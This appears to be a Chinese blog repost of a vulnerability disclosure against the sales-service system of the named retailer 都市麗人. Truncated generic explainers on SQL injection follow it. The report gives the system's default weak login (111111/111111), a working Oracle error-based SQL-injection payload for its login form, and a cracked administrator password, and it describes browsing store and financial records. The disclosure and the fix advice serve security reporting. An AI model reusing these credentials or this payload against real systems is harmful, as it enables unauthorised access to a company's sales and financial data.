都市麗人SQL注入漏洞導致門店銷售資料洩露

2021-12-30 02:44:31 字數 1267 閱讀 2775

都市麗人sql注入漏洞一枚全部門店銷售資料洩露

mss銷售服務系統位址:

存在的問題:

1.弱口令

賬號:111111 密碼:111111,同時大多數加盟商的密碼也都是預設的111111。

2.sql注入

提交登入資料位址:

資料:loginway=0&usercode=' and length(password)=32 and 1=ctxsys.drithsx.sn(1,(select username from sys_user where rownum=1)) and 'a'='a&passwd=1

直接爆管理員賬號

再來爆登入用的使用者編號

再爆密碼

解密得到密碼:dslrmss,登入系統

門店使用者

財務流水

各種查詢

怕進入太深查水表,就到此為止!!!

過濾sql注入字元,修改弱口令

SQL注入漏洞

sql注入漏洞曾經是web應用程式的噩夢,cms bbs blog無一不曾受其害。sql注入的原理 以往在web應用程式訪問資料庫時一般是採取拼接字串的形式,比如登入的時候就是根據使用者名稱和密碼去查詢 string sql select top 1 from user where username...

SQL注入漏洞

sql注入,就是通過把sql命令插入到web表單遞交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令,比如先前的很多影視 洩露vip會員密碼大多就是通過web表單遞交查詢字元暴出的,這類表單特別容易受到sql注入式攻擊 sql注入的發生 當應用程式使用輸入內容來構造動態sq...

sql注入漏洞

什麼是sql注入 通過把sql命令插入到web表單提交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。通俗地講,它是利用現有應用程式,將 惡意 的sql命令注入到後台資料庫引擎執行的能力,它可以通過在web表單中輸入 惡意 sql語句得到乙個存在安全漏洞的 上的資料庫,而...